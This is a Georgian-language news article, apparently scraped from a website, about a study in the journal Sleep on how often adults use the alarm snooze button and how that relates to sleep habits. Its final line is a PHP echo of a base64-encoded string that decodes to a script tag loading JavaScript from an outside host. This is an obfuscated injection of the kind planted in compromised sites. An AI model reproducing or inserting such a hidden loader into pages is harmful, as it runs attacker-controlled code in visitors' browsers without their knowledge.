celsiusi
ავერსი საქკაბელი
ყოველ დილით, როდესაც მაღვიძარა გაღვიძებთ, თუკი დროებითი გათიშვის ღილაკს (სნუზი) ხშირად იყენებთ, მარტო არ ხართ — ახალი კვლევის მიხედვით, რომელიც  ჟურნალ Sleep-ში გამოქვეყნდა, ზრდასრულ ადამიანთა 57 პროცენტი ტრადიციულად საწოლში რჩება მეორედ, მესამედ ან მეოთხედ დარეკვამდე.
 
რატომ ვიყენებთ მაღვიძარას დარეკვისას დროებით გათიშვის ღილაკს - მეცნიერების პასუხი
 
დროებითი გათიშვის ღილაკის (სნუზი) საყოველთაო გამოყენება მისი პოპულარობის დასტურია — გაგიჭირდებათ დღეს მის გარეშე ნახოთ ტელეფონის აპლიკაცია ან მაღვიძარა საათი; თუმცა, არაერთი ექსპერტი გვაფრთხილებს, რომ ამ ღილაკის გამოყენება ჩვენთვის ცუდია.
 
ძილის მეცნიერები ირწმუნებიან, რომ თეორიულად, მაღვიძარა ჩვენს ძილის ციკლს არღვევს, ართულებს, ჩვენით გამოღვიძებას უფრო ართულებს. ნახევრად მძინარე ადამიანისთვის დროებითი გათიშვის ღილაკის გამოყენება ასე მაცდური არასოდეს არის… მაგრამ მაღვიძარას რამდენიმე წუთით დადუმებას ჩვენი სხეული ძილის შემდეგ ფაზაში გადაჰყავს, იქამდე, ვიდრე ისიც არ დაირღვევა.
 
მიუხედავად მაღვიძარას დროებით გათიშვის ასეთი უარყოფითი მხარეებისას, მისი ეფექტების შესახებ მყარი მონაცემები მწირია და უმეტესი რამ, რაც ამ თემაზე ვიცით, მომდინარეობს ძილთან ან სტრესთან დაკავშირებული ქცევების კვლევებიდან.
 
„ზოგადად, სამედიცინო შეხედულება მაღვიძარას დროებითი გათიშვის წინააღმდეგია, მაგრამ როდესაც დავინტერესდით, არსებობდა თუ არა მყარი მონაცემები, ერთიც ვერ ვიპოვეთ. ახლა უკვე გვაქვს მონაცემები, რათა დავამტკიცოთ, რამდენად გავრცელებულია ის, მაგრამ ჯერ კიდევ ბევრი რამ რჩება, რაც არ ვიცით“, — ამბობს ინდიანას ნოტრ-დამის უნივერსიტეტის ნეირომეცნიერი სტივენ მეტინლი.
 
კვლევაში 450 ზრდასრული ადამიანი მონაწილეობდა და დაეფუძნა მონაცემებს ძილის შესახებ ყოველდღიური გამოკითხვებიდან და პორტატული მოწყობილობებიდან; აღმოჩნდა, რომ დროებითი გათიშვის ღილაკს ქალები 50 პროცენტით უფრო მეტად მიმართავდნენ, ვიდრე კაცები. ამავდროულად, გამოცდილი „სნუზერები“ დღის განმავლობაში უფრო ცოტა ნაბიჯს დგამდნენ, ვიდრე თვითგამოცხადებული არასნუზერები და უფრო მეტად ჰქონდათ ძილის მახასიათებლები, რომლებიც ძილის აშლილობის უფრო მეტ ნიშანს აჩვენებდა.
 
გათვალისწინებული იყო ძილის უპირატესობებიც. აღმოჩნდა, რომ „ღამის ჭოტები“ დროებითი გათიშვის ღილაკს უფრო ხშირად იყენებენ და ზოგადად, უფრო დაღლილები იყვნენ. ამას გარდა, დადგინდა ისიც, რომ ამ ღილაკს უფრო ხშირად იყენებენ ზოგადად ახალგაზრდები.
 
ახალი ექსპერიმენტი მიუთითებს, რატომ არ არის ბევრი ძილი ყოველთვის სასარგებლო
 
არც ერთი ეს დასკვნა არ წარმოადგენს პირდაპირ მიზეზობრივ კავშირს მაღვიძარას გათიშვასა და გვიან ადგომას ან დღის განმავლობაში ნაკლებ აქტიურობას შორის; თუმცა როგორც აჩვენებს, მაღვიძარას გათიშვა შეიძლება კარგი შეგრძნება იყოს ერთისთვის, მაგრამ მეორისთვის არც ისე კარგი. როგორც წარსულში ჩატარებული კვლევები აჩვენებს, ყველა ჩვენგანს სხვადასხვანაირად გვძინავს.
 
ალბათ არც არის გასაკვირი, რომ სნუზერები უფრო მეტად ხედავდნენ პოზიტივს მაღვიძარას გათიშვაში, როგორიცაა უკეთესი განწყობა და შემდეგში სიფხიზლის შეგრძნება; არასნუზერები ასეთ სარგებელთა არსებობას არ დაეთანხმნენ.
 
მაღვიძარას დროებით გათიშვის ღილაკზე ხელის დაჭერის მთავარ მიზეზებს შორის იყო: „პირველ დარეკვაზე საწოლიდან ვერ ვდგები“ და „საწოლში ყოფნა კომფორტულია“. თუმცა, მკვლევრები მიანიშნებენ იმ ფაქტზე, რომ აშშ-ში ყოველ მესამე ადამიანს საკმარისად არ სძინავს და ალბათ სწორედ ამიტომ აღმოჩნდა მათ კვლევაში მონაწილე ნახევარზე მეტი სნუზერი.
 
ღამით დაძინების არარეგულარულ დროს დრამატული გავლენა აქვს განწყობასა და დეპრესიაზე
 
„აუცილებლად უნდა აღინიშნოს, რომ ეს სტატისტიკა მხოლოდ მოსახლეობის მცირე ნაწილს ასახავს, რომელიც სავარაუდოდ საუკეთესო მდგომარეობაშია ძილის ჩვევებთან მიმართებაში. წარმოდგენა არ გვაქვს სხვადასხვა ასაკობრივ ჯგუფთა შესახებ, მაგალითად, თინეიჯერების, დაბალშემოსავლიანი ოჯახების ან ისეთი მოსახლეობის, რომელსაც ისტორიულად უფრო მეტად ძილნაკლულია, ვიდრე ამ კვლევის რესპონდენტები“, — ამბობს მეტინლი.
 
კვლევის ავტორები თავს იკავებენ იმის თქმისგან, მაღვიძარას დროებით გათიშვა ჩვენთვის კარგია თუ ცუდი, მაგრამ ხაზს უსვამენ, რომ ნებისმიერი სახის გასაღვიძებელი ზარის გამოყენება კარგი არ უნდა იყოს ჩვენი ზოგადი ჯანმრთელობისთვის.
 
სხვა სიტყვებით რომ ვთქვათ, პასუხია მეტი ძილი და არა რამდენიმე დაჭერა სნუზის ღილაკზე — შესაბამისი ხანგრძლივობის ძილი, რეგულარულობა გეგმის მიხედვით და რაც შეიძლება მშვიდი და დაუღალავი.
 
რაც შეეხება მაღვიძარას გათიშვას, მკვლევრებს ამ მიმართულებით უფრო დეტალური კვლევები სურთ ადამიანთა უფრო დიდ ჯგუფებზე.
 
481
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");